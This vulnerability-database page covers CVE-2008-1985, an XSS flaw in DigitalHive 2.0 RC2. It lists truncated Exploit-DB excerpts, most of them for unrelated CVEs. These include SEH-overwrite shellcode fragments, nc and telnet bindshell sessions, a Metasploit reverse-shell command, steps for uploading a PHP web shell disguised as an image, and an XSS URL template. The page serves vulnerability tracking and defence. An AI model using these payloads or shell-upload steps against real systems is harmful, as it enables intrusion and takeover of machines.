CVE-2008-1985
published 2008-04-27CVE-2008-1985: Cross-site scripting (XSS) vulnerability in base.php in DigitalHive 2.0 RC2 allows remote attackers to inject arbitrary web script or HTML via the mt…
PriorityP416medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.46%
70.3th percentile
Cross-site scripting (XSS) vulnerability in base.php in DigitalHive 2.0 RC2 allows remote attackers to inject arbitrary web script or HTML via the mt parameter, possibly related to membres.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| digital_hive | digitalhive | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)
exploitdb·2010-07-03
CVE-2008-6898 SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)
SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)
---
'SEH Overwrite exploited by Blake
'Original EIP method by callAX
'Tested on XP SP3/IE7 in virtualbox
'$ nc 192.168.1.155 4444
'Microsoft Windows XP [Version 5.1.2600]
'(C) Copyright 1985-2001 Microsoft Corp.
'
'C:\Documents and Settings\blake\Desktop>
buffer = String(8349, "A")
nseh = unescape("%eb%06%90%90") ' short jump
seh = unescape("%4E%20%D1%72") ' 0x72D1204E [msacm32.drv]
nops = String(20, unescape("%90")) ' nop sled
junk = String(2000, "C")
sc = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
unescape("%56%58%3
Exploit-DB
Digital Hive - Multiple Vulnerabilities
exploitdb·2009-12-14
CVE-2008-1985 Digital Hive - Multiple Vulnerabilities
Digital Hive - Multiple Vulnerabilities
---
[-]##############################################################
|
| DigitalHive Remote File Upload Vulnerability
|
| Author : ViRuSMaN
|
| Contact : [email protected]
|
| Home : Islam-Attack.CoM , HackTeach.OrG
|
| Download :http://www.digitalhive.com/base.php?page=site/telechargements.php&var=accueil
[-]##############################################################
|
| Exp:
|
| 1- First signup in the forum by going here http://localhost/[script]/base.php?page=inscription.php
|
|
| 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click "modfier"
|
|
| 3-Now upload your shell in "php.jpg" format
|
|
| 4-Finally do a right click in the icon situated in "Apparence" then copy the link of your shell.
Exploit-DB
VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)
exploitdb·2008-10-23
CVE-2008-4686 VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)
VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
# 10/23/2008 k`sOSe
# Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit
# 1 - Works on Windows XP SP1, SP2, SP3 (and probably win2k)
# 2 - Works both with a local file and with a remote url
# 3 - VLC do not crash!
# 4 - Enjoy a respawing shell, even if VLC will be closed!
#
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:\Program Files\VideoLAN\VLC>exit
# exit
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:\Program Files\VideoLAN\VLC>exit
# exit
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft C
Exploit-DB
CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)
exploitdb·2008-09-05·CVSS 7.6
CVE-2008-2639 [HIGH] CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)
CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)
---
##
# $Id: citect_scada_odbc.rb
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
#
#
# msfcli exploit/windows/misc/citect_scada_odbc RHOST=192.168.2.45 PAYLOAD=windows/shell/reverse_ord_tcp LHOST=192.168.2.101 TARGET=2 E
# [*] Started reverse handler
# ...
# [*] Sending stage (474 bytes)
# [*] Command shell session 1 opened (192.168.2.101:4444 -> 192.168.2.45:1039)
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Citect\CitectSCADA\Bin>
#
# Arbi
Exploit-DB
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
exploitdb·2008-05-23·CVSS 7.5
CVE-2008-1881 [HIGH] VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
---
#!/usr/bin/python
#
# VLC 0.8.6d Double Sh311 Universal Exploit
# CVE-2007-6681
# Vulnerability Discovered by Michal Luczaj
#
# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/
# and
# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net
# WE CODED IT JUST FOR FUN ;)
# Cheers to #offsec and all our firends :) and prelate_ hehe
#-----------------------------------------------------------------------------
#
# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP
#
# matte@badrobot:~$ telnet 192.168.1.245 4444
# Trying 192.168.1.245...
# Connected to 192.168.1.245.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\
Exploit-DB
Digital Hive 2.0 - 'base.php' Cross-Site Scripting
exploitdb·2008-04-24
CVE-2008-1985 Digital Hive 2.0 - 'base.php' Cross-Site Scripting
Digital Hive 2.0 - 'base.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/28918/info
Digital Hive is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Digital Hive 2.0 RC2 is vulnerable; other versions may also be affected.
http://www.example.com/a/hive_v2.RC2/base.php?page=membres.php&mt=[XSS]
Exploit-DB
Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)
exploitdb·2008-03-26
CVE-2008-1610 Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)
Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)
---
#!/usr/bin/python
# Quick TFTP Pro 2.1 SEH Overflow (0day)
# Tested on Windows XP SP2.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/quick-tftp-poc.py.txt
#########################################################
# bt ~ # quickftp.py
# [*] Quick TFTP Pro 2.1 SEH Overflow (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.130 4444
# (UNKNOWN) [172.16.167.130] 4444 (krb524) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator>
##########################################################
import socket
import sys
print
No writeups or analysis indexed.
http://www.securityfocus.com/bid/28918http://www.z0rlu.ownspace.org/index.php?/archives/65-hive-v2.RC2-XSS.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/42006http://www.securityfocus.com/bid/28918http://www.z0rlu.ownspace.org/index.php?/archives/65-hive-v2.RC2-XSS.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/42006
2008-04-27
Published